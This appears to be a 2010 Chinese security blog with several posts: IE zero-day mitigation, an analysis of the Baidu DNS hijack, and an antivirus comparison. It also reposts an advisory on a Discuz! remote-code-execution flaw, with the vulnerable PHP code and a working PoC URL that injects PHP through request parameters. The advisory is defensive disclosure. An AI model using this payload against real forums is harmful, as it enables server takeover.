博客首页|TW首页| 同事录|业界社区
2010-01-19
针对IE浏览器刚刚曝出的“极光”0Day漏洞,据了解,微软的官方补丁可能还要等两周左右,目前微软提供的临时方案是开启IE浏览器DEP保护、禁止JS脚本和ACTIVEX选项。

     针对IE浏览器刚刚曝出的“极光”0Day漏洞,据了解,微软的官方补丁可能还要等两周左右,目前微软提供的临时方案是开启IE浏览器DEP保护、禁止JS脚本和ACTIVEX选项。

   经安天工程师测试发现,将IE属性中的安全设置为高后后遗症表现为:

    a.不显示某些验证码
  b.不显示某些动态图片
  c.不显示某些论坛的帖子列表
  d.论坛快速跳转功能无用
  e.论坛发贴时按Ctrl+Enter提交无反应
故此处对浏览器属性的安全设置步骤不予给出,主要给出DEP的具体保护步骤:

 

1.   我的电脑――>右键――>属性――>弹出系统属性 对话框――>单击高级选项卡 :

 

 

图 1   系统属性 - 高级选项卡

 

2.   ――>在性能区域中――>单击设置

 

 

图 2   性能选项

3.   ――>单击数据执行保护选项卡:

 

 

 

 

图 3   数据执行保护选项卡

 

4.   ――>选择为除下列选定程序之外的所有程序和服务启用 DEP (U) 单选按扭(不要勾选windows Explorer)

――>单击应用――>然后单击确定

――>此时将出现一个对话框,并通知您必须重新启动计算机才能使设置生效

――>单击确定

 数据执行保护设置完成。

1.事件概述

· 发生时间

    2010年1月12日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈,12时左右基本恢复正常;18时许百度发布官方版本公告;对事故原因说明为:“因www.baidu.com的域名在美国域名注册商处被非法篡改,导致全球多处用户不能正常访问百度。”

· 相关现象

(1)在整个事件期间百度顶级域名baidu.com及旗下全部二级域名访问都出现异常,在较长的时间全部被解析到位于荷兰的IP地址188.95.49.6。但通过IP入口(如http://202.108.22.5/),其他顶级域下的域名入口如baidu.hk等可以正常访问。
在访问百度过程中先后出现过不同现象:
跳转至伊朗网军(IRANIAN CYBER ARMY)页面;
跳转至雅虎错误页面;
不能正常访问等。

跳转到雅虎错误页面:

(2)在此期间查询baidu whois信息可以发现异常,并有被不止一次修改的迹象。

· 事件的初步定性

    安天CERT在今早九时对事件作出定性,此事件为通过whois信息篡改实施的DNS劫持类攻击,并将有关初始分析报告和结论向关联CERT机构进行了提交。

2.DNS原理及域名的管理

· 什么是DNS

    网络节点能够被寻址访问的原因,是由于网络节点拥有一个独立身份证,这是由网卡物理地址、IP地址和网络端口组成的一个地址体系。对于以TCP/IP为基础协议的Internet来说,必须找到访问对象的IP地址,才能进行访问,但由于IP地址难于记忆,也不够灵活,Internet规则的制定者发明了一套域名体系与其对应,这就是DNS(域名解析服务)的基础体系。这时用户无需记忆大量的IP地址数字(如202.108.22.5),而能通过域名访问丰富多彩的互联网内容(如www.baidu.com),这给用户带来了极大的方便,但也产生了相关的安全隐患。

· 国际域名的业务体系

    域名体系管理是由ICANN组织进行的,其下有多家顶级域名注册商,而注册商下又可能有多级代理商。

· DNS解析的基本原理

DNS服务的工作原理:

    上图是用户访问一个域名后,通过本地DNS服务器发出递归查询请求的流程图,然而大多数DNS服务器都是可以处理递归查询,通过询问其他服务器和提供响应给发出请求的用户,进而利用递归式DNS来为客户端提供域名解析的答案。以下为它的执行流程:

 

  • 一个用户在浏览器中输入www.antiy.com。首先计算机询问它的本地DNS服务器,以确定www.antiy.com的IP地址。
  • 本地的DNS服务器首先在它的本地表(或缓存)中进行查找“www.antiy.com”,如果找到那么将其返回客户端,如果没有发现,那么DNS服务器发送一个查询给根服务器,来查询“www.antiy.com”的IP地址。
  • 根服务器收到信息后会回应“www.antiy.com”顶级域(TLD)服务器的地址。
  • 然后由本地的DNS服务器联系顶级域名(TLD)服务器来确定“www.antiy.com”的IP地址。
  • 顶级域(TLD)服务器会回应针对“www.antiy.com”的名称的服务器地址。
  • 本地DNS服务器联系得到的“www.antiy.com”的名称服务器来确定它的IP地址。
  • 本地DNS服务器发送这个响应给最初的用户:www.antiy.com=222.171.15.74

3.DNS相关的安全威胁和案例

· 利用DNS服务器进行DDOS攻击

    正常的DNS服务器递归询问过程可能被利用成DDOS攻击的。假设攻击者已知被攻击机器的IP地址,然后攻击者使用该地址作为发送解析命令的源地址。这样当使用DNS服务器递归查询后,DNS服务器响应给最初用户,而这个用户正是被攻击者。那么如果攻击者控制了足够多的肉鸡,反复的进行如上操作,那么被攻击者就会受到来自于DNS服务器的响应信息DDOS攻击。下图为攻击原理:

  1. 攻击者发送控制信号给肉鸡群机器。
  2. 肉鸡群机器针对这个递归DNS不断的执行这条记录的查询。
  3. 本地的DNS服务器首先在它的本地表(或缓存)中进行查找“www.antiy.com”,如果找到将其返回客户端,如果没有发现,那么DNS服务器发送一个查询给根服务器,来查询“www.antiy.com”的IP地址。
  4. 根服务器收到讯息(信息)后会回应“www.antiy.com”顶级域(TLD)服务器的地址。
  5. 然后由本地的DNS服务器联系顶级域名(TLD)服务器来确定“www.antiy.com”的IP地址。
  6. 顶级域(TLD)服务器会回应针对“www.antiy.com”的名称的服务器地址。
  7. 本地DNS服务器联系得到的“www.antiy.com”的名称服务器来确定它的IP地址。
  8. 递归DNS获得了某域名的IP地址后,把所有信息都回复给源地址,而此时的源地址就是被攻击者的IP地址了。

    如果攻击者拥有着足够多的肉鸡群,那么就可以使被攻击者的网络被拖垮至发生中断。利用DNS服务器攻击的重要挑战是,攻击者由于没有直接与被攻击主机进行通讯,隐匿了自己行踪,让受害者难以追查原始的攻击来。相对比较好的解决办法就是可取消DNS服务器中允许人人查询网址的递回(recursive)功能。

· DNS缓存感染

    攻击者使用DNS请求,将数据放入一个具有漏洞的DNS服务器的缓存当中。这些缓存信息会在客户进行DNS访问时返回给用户,从而把用户客户对正常域名的访问引导到入侵者所设置挂马、钓鱼等页面上,或者通过伪造的邮件和其他的server服务获取用户口令信息,导致客户遭遇进一步的侵害。

· DNS信息劫持

    原则上TCP/IP体系通过序列号等多种方式避免仿冒数据的插入,但入侵者如果通过监听客户端和DNS服务器的对话,就可以猜测服务器响应给客户端的DNS查询ID。每个DNS报文包括一个相关联的16位ID号,DNS服务器根据这个ID号获取请求源位置。攻击者在DNS服务器之前将虚假的响应交给用户,从而欺骗客户端去访问恶意的网站。假设当提交给某个域名服务器的域名解析请求的数据包被截获,然后按截获者的意图将一个虚假的IP地址作为应答信息返回给请求者。这时,原始请求者就会把这个虚假的IP地址作为它所要请求的域名而进行连接,显然它被欺骗到了别处而根本连接不上自己想要连接的那个域名。

· DNS重定向

    攻击者如果将DNS名称查询重定向到恶意DNS服务器。那么被劫持域名的解析就完全至于攻击者的控制之下。

· ARP欺骗

    ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP 木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
    ARP欺骗通常是在用户局网中,造成用户访问域名的错误指向,但在IDC机房被入侵后,则也可能出现攻击者采用ARP包压制正常主机、或者压制DNS服务器,而李代桃僵,以使访问导向错误指向的情况。

· 本机劫持

    在计算机系统被木马或流氓软件感染后可能会出现部分域名的访问异常,如访问挂马或者钓鱼站点、无法访问等情况,本机劫持有hosts文件篡改、本机DNS劫持、SPI链注入、BHO插件等方式,虽然并非都通过DNS环节完成,但都会造成无法按照用户意愿获得正确的地址或者内容的后果。

· 与DNS相关的一些攻击案例

事件1:百度遇DDOS攻击事件
    2006年09月12日17点30分,有北京、重庆等地的网友反映百度无法正常使用,出现“请求超时”(Request timed out)的信息。这次攻击造成了百度搜索服务在全国各地出现了近30分钟的故障。随后,百度技术部门的员工们快速反应,将问题解决并恢复百度服务。9月12日晚上11时37分,百度空间发表了针对不明攻击事件的声明。“今天下午,百度遭受有史以来最大规模的不明身份黑客攻击,导致百度搜索服务在全国各地出现了近30分钟的故障。”
    2006年09月22日,新网对外做出证实DNS服务器遭到大规模黑客攻击,从21日下午4点多开始持续到凌晨12点。尽管目前服务已经恢复正常,但是技术人员正在追踪攻击来源,并分析攻击技术手段。新网是国内最大域名服务商之一,黑客持续8小时的攻击,导致在新网注册30%的网站无法正常访问。其中包括天空软件、艾瑞视点、中国网库等知名网站。
事件3:暴风影音事件
    2009年5月18日晚上22点左右,DNSPod主站及多个DNS服务器遭受超过10G流量的恶意攻击。耗尽了整个机房约三分之一的带宽资源,为了不影响机房其他用户,最终导致DNS服务器被迫离线。该事件关联导致了使用DNSPod进行解析的暴风影音程序频繁的发生域名重新申请,产生请求风暴,大量积累的不断访问申请导致各地电信网络负担成倍增加,网络出现堵塞。于2009年5月19日晚21时左右开始,江苏、安徽、广西、海南、甘肃、浙江六省陆续出现大规模网络故障,很多互联网用户出现访问互联网速度变慢或者无法访问网站等情况。在零点以前,部分地区运营商将暴风影音服务器IP加入DNS缓存或者禁止其域名解析,网络情况陆续开始恢复。

4.百度攻击事件分析

    百度被攻击前和攻击后的相关信息对比如下:

被攻击前 被攻击后

Domain Name: BAIDU.COM
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Updated Date: 03-dec-2008
Creation Date: 11-oct-1999
Expiration Date: 11-oct-2014

Domain Name: BAIDU.COM
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Updated Date: 12-jan-2010
Creation Date: 11-oct-1999
Expiration Date: 11-oct-2014

    百度攻击事件前baidu.com最后修改的时间是2008年12月3号,到期日期是2014年8月11号。
    百度攻击事件后修改的时间变为是2010年的1月12号。

    有关涉及到域名解析的whois信息在此过程中曾被进行多次修改,其中可证实的包括。

Name Server
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Name Server: NS2303.HOSTGATOR.COM
Name Server: NS2304.HOSTGATOR.COM

    根据有关whois信息查询,百度的域名注册服务商是register.com,是一家顶级域名注册机构。
    百度Whois 信息如下:

    对whois.register.com 与www.register.com 的IP获取如下:
    whois.register.com IP: 216.21.239.106
    www.register.com   IP: 216.21.239.101
    两台IP服务器位于同一个网段。

    通过有关信息可以对有关网络传闻作出如下结论

    (1)百度域名到期日为2014年10月14日,可以明确排除百度因域名未续费导致异常的传闻。
    (2)百度域名异常期间,可以验证其主站及其他2级域名可以按照如下IP规则进行访问并获得正常搜索结果。

 

   内容

异常域名

可以正常访问的IP地址

百度首页

www.baidu.com

http://202.108.22.5

百度新闻

news.baidu.com

http://61.135.163.87

百度贴吧

tieba.baidu.com

http://61.135.163.220

百度知道

zhidao.baidu.com

http://61.135.163.85

百度mp3

mp3.baidu.com

http://61.135.163.89

百度图片

image.baidu.com

http://61.135.163.93

百度视频

video.baidu.com

http://61.135.163.91

可以排除百度自身信息系统因遭遇故障导致问题的可能。
    (3)可以确认百度域名访问异常的核心原因是百度域名服务商register.com遭到攻击,导致其whois系统向全球DNS体系提供了错误的域名解析服务器导致。但攻击register.com的具体方法尚难推定。初步分析认为www.register.com有一定安全隐患,不能排除是攻击者入侵入口,并进一步攻击了whois.register.com的可能性。尽管whois.register.com采用的是SSL的加密交互方式,但SSL的脆弱性在过去1年内已经被很多公开资料所披露。有关攻击技巧的组合有可能严重威胁传统的域名注册机构、以及代理机构的安全。

因此我们通过两个图示完整解析域名有关机制和百度受到攻击的过程。


正常情况下的全球DNS体系、baidu和用户三者的关系图示

  1. 百度公司通过域名注册机构(本事件中为register.com)成功申请域名,并发布原始Whois信息。Whois信息中包含了域名解析服务器。
  2. 有关whois信息通过数据库发布到全球DNS网络中,baidu.com顶级域名下所有域名会被指向到百度的DNS体系查询。
  3. 百度的DNS体系由DNS.baidu.com、NS2.baidu.com、NS3.baidu.com、NS4.baidu.com互为后备组成。
  4. 相关DNS体系向全球域名网络提交有关站点的正确IP信息。
  5. 用户访问时,向自身的DNS服务器查询baidu.com的IP地址,并走正常的缓存和逐级查询过程,获取baidu.com的正确IP,访问baidu的网络服务。


图一:攻击示意图

  1. 攻击者入侵register有关站点。
  2. 攻击者修改baidu.com有关whois信息,把baidu.com的域名解析服务修改成自身可控的DNS服务器。
  3. 有关DNS服务器在收到查询时发布错误的IP地址,指向攻击者发布有关内容的服务器。
  4. 用户此时通过域名方式无法访问正常的百度,之后只能访到攻击者预设的内容。
  5. 百度此时除了协调register.com修改自己的whois信息外,没有其他可以使域名正常访问的方法。

5.结论与建议

    本次事件再度揭示了全球DNS体系的脆弱性,并说明互联网厂商如果仅有针对自身信息系统的安全预案,不足以快速应对全面而复杂的威胁。
    安天从一个安全研究机构自身的角度回溯:在相关历史案例中whois信息更多与非法获取域名所有权的有关纠纷相关,但以此为入口对主流互联网厂商进行域名劫持攻击并不是十分常见,过去安全业界更多的关注根DNS的安全性以及局部的类似DNS缓存感染类的威胁,而对域名业务体系的安全性关注不够。而从现有效果来看,这无疑是具有全局威胁、难以响应防范的一种攻击,因为攻击点位于域名所有者可以控范围之外,而由于DNS体系的特点、DNS管理权利的不均衡、地区时间差、缺少理性沟通机制等诸多因素,都可能导致国内互联网站点在自身信息系统完全正常的情况下遭到“灭顶之灾”,而鞭长莫及。
    从2000年的YAHOO等大型站点遭遇DoS,随后带动TFN2K等攻击工具和方法泛滥等案例来看,每一次“非典型攻击”都会成为一个恶性的示范样板,有关事件必然诱使DNS业务体系成为未来一阶段攻击的重灾区。
因此我们建议:
(1)针对网站运营者:原则上应为自身站点准备两套域名,且两个域名应该通过两个不同的服务商注册。
(2)大型网站的应急预案应进一步修正有关处理流程,强化对域名服务商的协调流程。
(3)域名注册商和代理机构近期可能成为集中攻击目标,需要加以防范。
(4)国内有关机构应快速建立与境外有关机构的协调能力,协助国内企业实现对有关事件的快速交涉处理。

2010-01-12

安全突发事件跟踪:由于百度遭到黑客攻击,造成域名解析与访问出错,为了方便广大公务员考试成绩查询学生不耽误搜索结果,安天防线为广大用户提供了一个直接访问百度的IP地址。现在唯一能够访问百度的地址为:http://202.108.22.5/

 

百度首页[可通过ip访问]  www.baidu.com >> 202.108.22.5
百度新闻[可通过ip访问] news.baidu.com >> 61.135.163.87
百度贴吧[可通过ip访问] tieba.baidu.com >> 61.135.163.220
百度知道[无法访问] zhidao.baidu.com >> 61.135.163.85
百度mp3[可通过ip访问] mp3.baidu.com >> 61.135.163.89
百度图片[可通过ip访问] image.baidu.com >> 61.135.163.93
百度视频[可通过ip访问] video.baidu.com >> 61.135.163.91

2010-01-08

Discuz!论坛出现重大0Day漏洞,相信包括凤凰卫视的凤凰网论坛在内,许多采用Discuz的人气论坛都会受到黑客攻击,昨天一些大论坛已经开始处于关闭状态,所以各大网站的网管们,如果你使用的论坛是Discuz!的,在漏洞补丁没有出现之前,还是关闭吧。

这个漏洞可以让黑客完全控制你的服务器。

以下内容来自互联网

特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此另外有安装插件的用户不受影响。

 

漏洞分析:

下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:

一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = ”, $extra = ”, $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from blog.sina.com.cn
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define(’CACHE_FORBIDDEN’, TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? ” : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.’./forumdata/funcstat.log’;
        if($fp = @fopen($statlogfile, ‘a’)) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message).”\n”);
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message).”\n”);
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = ”;
        }
    }

    if(!defined(’STAT_DISABLED’) && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }

    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader(”location: “.str_replace(’&’, ‘&’, $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = ”;
    }
    if(in_array($extra, array(’HALTED’, ‘NOPERM’))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }

    include language(’messages’);

    $vars = explode(’:', $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
        eval_r(”\$show_message = \”".str_replace(’”‘, ‘\”‘, $scriptlang[$vars[0]][$vars[1]]).”\”;”);//$scriptlang未初始化,可以自定义,from blog.sina.com.cn
    } elseif(isset($language[$message])) {
        $pre = $inajax ? ‘ajax_’ : ”;
        eval_r(”\$show_message = \”".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).”\”;”);
        unset($pre);
    }

    ……
}

二、DZ的全局机制导致了未初始化的参数可以任意提交:
foreach(array(’_COOKIE’, ‘_POST’, ‘_GET’) as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != ‘_’ && $$_key = daddslashes($_value);
    }
}

三、misc.php正好有个可以自定义message的点,其实也是未初始化:
elseif($action == ‘imme_binding’ && $discuz_uid) {

    if(isemail($id)) {
        $msn = $db->result_first(”SELECT msn FROM {$tablepre}memberfields WHERE uid=’$discuz_uid’”);
        $msn = explode(”\t”, $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id,
‘@’)));
        $msn = “$msn[0]\t$id”;
        $db->query(”UPDATE {$tablepre}memberfields SET msn=’$msn’ WHERE uid=’$discuz_uid’”);
        showmessage(’msn_binding_succeed’, ‘memcp.php’);
    } else {
        if($result == ‘Declined’) {
            dheader(”Location: memcp.php”);
        } else {
            showmessage($response['result']);//$response没有初始化,可以自定义,from blog.sina.com.cn

        }
    }

   }

四、漏洞利用:

showmessage函数里$vars = explode(’:', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。

五、漏洞修复:

1.有补丁的打补丁;
2.没有补丁可以暂时先注释引起漏洞的语句,或者对两个变量赋个值。

poc:

misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

2010-01-05
病毒泛滥,用户在挑选杀毒软件时十分迷茫,到底选择什么杀毒软件好?免费杀毒软件可以选择?哪些杀毒软件值得掏钱?为了给广大用户一个直观的对比,我们选择了当前市场上9款主流的杀毒软件进行横向评测。
 
测试项目
本次测试,我们根据用户使用杀毒软件的实际情况,将评测分为基础测试、特色功能评测和防挂马测试三部分。
基础测试:主要测试杀毒软件的基本能力,包括病毒查杀、扫描时间、安装情况、闲时内存占用、续值是不是方便等。
防挂马测试:我们准备了10个挂马网站,登录这项网站看杀毒软件是不是能进行拦截。如果出现发现网站被挂马但却未能拦截的情况,需要特别进行说明。
 
测试平台
平台:笔记本电脑
CPU:双核 1.73GHz
内存:1GB
硬盘:120 GB
浏览器:GreenBrowser
操作系统:Windows 7
测试要求:所有杀毒软件默认安装测试所有项目
注:由于IE 8具有对部分挂马代码有拦截能力,为了排除浏览器的影响,我们没有使用Windows 7自带的浏览器IE 8。此外,登录Windows 7时,我们用的是系统管理员身份,拥有足够多的权限,排除了木马因为权限不够不能运行的情况。
 
参评软件
1.卡巴斯基全功能安全软件2010(简称卡巴斯基)
2. ESET NOD32安全套装4(简称NOD32)
3.金山毒霸极速版(简称金山)
4.瑞星全功能安全软件2010(简称瑞星)
5.江民杀毒软件KV2010(简称江民)
6.360杀毒软件(简称360)
7.微软安全套装MSE(简称微软MSE)
8.安天木马防线2009(简称安天)
9.诺顿防病毒软件2010(简称诺顿)
注:在评测开始时,金山毒霸2010和安全木马防线2010还没有正式定型,所以没有参加评测,故使用的是金山毒霸极速版和安天木马防线2009替代,其中安天木马防线2009虽然嵌入了锐甲的功能,但并不完整,这个问题在2010版已经解决。根据国情,评测的微软的MSE是中文最新版而不是英文最新版。
 
      杀毒软件主要功能
金山毒霸极速版
 
       金山的极速版主要是针对笔记本、上网本用户开发的,拥有省电设计可以更长续航时间,该软件有极速扫描模式,使用这个扫描模式可以在极短的时间内完成病毒查杀,此外该软件还有禁止闪存和硬盘自动运行的功能,可以有效阻止病毒通过闪存途径入侵。在游戏时,隐蔽弹出窗口。
 
安天木马防线2009
 
安天最大的好处是可以跟其他杀毒软件兼容,例如卡巴斯基、瑞星、Nod32等,相当于第二道防线。该软件是靠查杀木马起家的,在网页木马抵御上面有很深的造诣。该软件在界面中有一个“工具合集”选项,可以下载使用安天提供的多种免费安全辅助工具。
 
诺顿防病毒软件2010
       诺顿新版本强化了SONAR主动防御,增加了诺顿下载智能分析功能,对下载的文件智能判断安全程度,拥有入侵防护、电子有限防护、浏览器主动防护等功能。杀毒时,对可疑文件会自动进行二次分析。
 
       360杀毒软件
       360杀毒软件最大的特点就是小巧玲玲、占用资源少,但相对的功能也较少,不过该软件的游戏免打扰功能设计的非常贴心,让用户在玩游戏时不用担心弹出警告窗口。
 
       微软安全套装MSE
       微软MSE支持实时保护,能监控电脑中程序和文件的活动,默认扫描闪存、移动硬盘,可以通过软件创建系统还原点。
 
ESET NOD32安全套装4
 
NOD32可以对 HTTPS 及 POP3S 等SSL加密通讯协议进行检查,在闪存插上时会扫描 Autorun.inf 及其相关文件,此外该软件在游戏全屏模式下弹出窗口时,不会退出全屏模式。
安全小百科:病毒如何通过闪存传播?
闪存中的Autorun.inf是一个安装信息文件,通过它可以实现可移动设备的自动运行,而病毒会窜改Autorun.inf文件,当用户双击时,引导系统激活隐藏的病毒代码从而感染系统。
 
瑞星全功能安全软件2010
瑞星提供了三种模式对不同人群提供不同等级的防护,家庭模式是为用户自动处理安全问题,专业模式是让用户拥有对安全事件的处理权,交易模式是满足用户进行炒股、网银交易等特殊环境时的安全需求。此外,在“工具”选项中,用户可以选择瑞星的安全辅助工具。
 
江民杀毒软件KV2010
 
江民增强了主动防御沙盒模式,增强了虚拟机脱壳,新增了扫描第三方软件漏洞并自动修复的功能。软件盒中搭配电脑系统保护程序,主要用途为恢复系统和保护数据。此外,在“工具”选项中,用户可以选择江民的安全辅助工具。
安全小百科:什么是沙盒?
沙盒(sandbox)又名为沙箱,它是一种虚拟技术,通过重定向技术,把程序生成和修改的文件定向到自身文件夹中。当某个程序试图发挥作用时,安全软件可以先让它在沙盒中运行,如果含有恶意行为,则禁止程序的进一步运行,而这不会对系统造成任何危害。
 
卡巴斯基全功能安全软件2010
卡巴斯基增强了文件和账号安全的保护能力,安全中心新增了“安全免疫区”功能,该功能模拟了一个虚拟环境,在该环境中运行程序即使激活病毒也不会对真实的电脑造成影响。此外,在“工具中心”选项中,用户可以选择家长控制、虚拟键盘等功能。
 

 

 
特色功能
额外的配套辅助工具
金山
省电设计、禁止闪存和硬盘自动运行
金山网盾
安天
跟其他杀毒软件兼容
锐甲
诺顿
下载文件智能分析
 
360
游戏免打扰功能
360安全浏览器、360安全卫士
微软
可以通过该软件创建系统还原点
 
NOD32
对加密通讯协议进行检查
 
瑞星
对不同人群提供不同等级的安全防护
瑞星卡卡、账号保险柜
江民
主动防御有沙盒模式
恶意网址过滤
卡巴斯基
有安全免疫区 多了隐私保护功能
 

 

 
 
设计贴近用户习惯
根据我们测试,我们发现杀毒软件有几个特征:安装上追求简便、续值上方便和界面追求清爽。
安装简便:对广大普通用户而言,杀毒软件安装时越简便越好,大多数杀毒软件在这方面都做的很好,一路“NEXT”或者“下一步”就可以了。不过,还是有部分杀毒软件在安装过程中需要额外的操作,微软安全套装MSE在安装过程中需要对系统进行正版验证;NOD32瑞星在安装过程中需要进行一些简单的设置,但不影响用户安装软件。
续值方便:微软MSE和360杀毒软件是免费的,不用考虑续值问题,其他软件是收费的,不过续值都非常方便,在软件界面上可以很方便的找到续值的链接或者按钮。此外杀毒软件使用期快到时,一般都会进行续费提示。
  
界面清爽:杀毒软件的界面都在追求清爽的效果,功能布局简洁美观;有的杀毒软件还可以更换皮肤,例如江民、瑞星;诺顿的界面比较华丽,能方便看到杀毒软件本身对系统资源的占用情况。
 
闲时内存占用普通较低
测试方法:测试杀毒软件静态占用内存,是在不操作笔记本电脑的情况下,在5分钟内随机3次读取杀毒软件的内存占用数据,如果3次读数的误差不超过0.5MB,就认为抽样读数合格,杀毒软件运行平稳,然后取这3次合格数据的平均值,正式记录杀毒软件闲时的内存占用情况。
特别说明:内存占用和监控力度成正比的,监控严密内存占用就较高,所以两者不能兼顾,用户要根据自己电脑的实际情况进行选择。
测试结果:从这9款杀毒软件的内存占用情况来看,各大反病毒厂商都在尽力减少产品占用内存资源上做了较大努力,闲时内存占用从以往年份平均30MB~50MB的水平,优化到现在平均10MB~30MB的水平。在空闲的情况下,微软MSE、诺顿占用的内存非常低,仅有5MB左右,最低的是360,内存占用仅有1MB左右。
杀毒软件
闲时内存占用
金山
17.5MB
安天
23MB
诺顿
5MB
360
1.7MB
微软
4MB
NOD32
43MB
瑞星
12MB
江民
38MB
卡巴斯基
19MB
安全小百科:为什么杀毒软件有多个进程?
一般来说杀毒软件在系统中起保护作用时,会采用多个模块实现不同的功能,一些是进行实时监控,一些是界面程序。在一些杀毒软件中为了防止病毒强行关闭杀毒软件,也会采用多个进程互相监控的方式增强自身强壮度,当一个进程关闭后,监控的进程就会重新启动这个进程。这也是为什么杀毒软件的进程不止一个的道理。
 
 
查病毒各显本事
测试方法:使用杀毒软件对1GB的文件夹进行扫描,统计出扫描时,看看哪款杀毒软件的扫描速度比较快。1GB文件夹里面包含电视剧、软件、音乐等普通用户电脑中常见的资源。
使用杀毒软件扫描病毒包,此次测试用的病毒全部是来自国内且曾经爆发过的病毒,此外我们还对病毒进行过筛选,全部病毒都是2009制造的,收集日期从1月1日持续到11月30日,中间没有掺杂老病毒。
病毒包收录了1000个病毒,其中木马类占85%,间谍软件类占5%,广告软件类为10%。病毒包中半数以上病毒具备通过闪存、移动硬盘传播的能力。广告软件类病毒所占比重不小,这个是我们特别考虑过的,今年出现了很多此类病毒的变种,造成了很恶劣的影响。
本次测试的病毒包主要有两个特点,一个特点是存在拥有免杀能力的病毒,约占总数的20%,一般免杀主要针对市场占有率高的杀毒软件,所以像瑞星等高市场占有率的杀毒软件会比较吃亏,在测试时我们酌情考虑。另外一个特点就是变种多,这个和病毒的发展趋势有关。变种多就容易出现漏杀的情况,特别是国外的软件在这方面比较吃亏,例如微软MSE等,在测试时我们酌情考虑。
安全小百科:什么是免杀病毒?
病毒为了骗过某款或者几款杀毒软件时,会通过在病毒代码中加头或者加尾的方式伪装成非病毒程序,蒙骗杀毒软件对自身的扫描。病毒在免杀处理中最常用的就是加壳、加花的方式,伪装自己为无害的程序。
       测试结果:9款杀毒软件在扫描时间上相差不过几十秒,在可以接受的范围内,其中
卡巴斯基和诺顿的查杀时间最少,均为21秒。
卡巴斯基、360和NOD32的病毒查杀成绩不错,特别是对免杀病毒和变种病毒的发现和清除表现得都非常好,排在第一梯队,紧随其后的是江民、安天、诺顿、金山,他们的表现都不俗,其他杀毒软件的表现也都在正常范围之内。
 
   
 
杀毒能力
金山
★★★★
安天
★★★★
诺顿
★★★★
360
★★★★☆
微软
★★★☆
NOD32
★★★★☆
瑞星
★★★☆
江民
★★★★
卡巴斯基
★★★★☆
安全小百科:为什么病毒要重启后才能被清除?
有些病毒会感染系统的关键进程,当杀毒软件查出病毒后却因为无法对正在运行的系统关键进程进行杀毒操作。此时杀毒软件就会提示重启后才能清除病毒。当系统重启后,杀毒软件会在系统关键进程之前启动,在病毒注入到系统关键进程之前将病毒清除。
 
防挂马能力都需加强
测试网站:我们从网上随机挑选10个挂马网页,这些网站在12月10号被挂马,在12月11日早上测试全部有效。在测试之前,我们GHOSHT系统,然后一一打开这10个恶意网页,看杀毒软件是否能够发现问题并进行拦截,记录测试结果(注:测试时采用用系统管理员登录模式,同时不使用IE 8浏览器)。
测试终止条件:杀毒软件被禁用并无法重启软件,或者系统被破坏无法使用。满足任一条件我们就终止测试。需要说明的是,如果杀毒软件没有拦截病毒,但杀毒软件还能运行、系统没有明显异常,我们仍然继续测试。如果杀毒软件发现病毒,但没有成功拦截病毒,在测试结果中会特别注明。
危害说明:我们特意在XP系统中测试恶意网站,逐次打开所有的恶意网站,系统中毒了,其中有下载类病毒,导致XP系统非常缓慢,各种盗号病毒进入电脑中,这些病毒会窃取用户的个人账号和密码。
测试结果:有的时候黑客会诱使用户点击某个链接直接下载网页木马或者病毒下载器直接从网上下载病毒,所以针对这种情况我们在浏览器中直接输入网页木马进行测试。从测试结果看,大部分杀毒软件是默认用户下载,而少部分杀毒软件在下载前先进行了初步安全判断,相对而言,卡巴斯基和NOD32表现较好。
 
在更多的情况下,用户是访问挂马网站激活了网页木马而中毒的。我们直接登录挂马网站进行测试,发现杀毒软件整体而言表现得不是很理想,相对而言,瑞星、金山、卡巴斯基和安天表现较好,都有一定的拦截能力(拦截率在50%以上),可以在较大程度上保护用户安全。
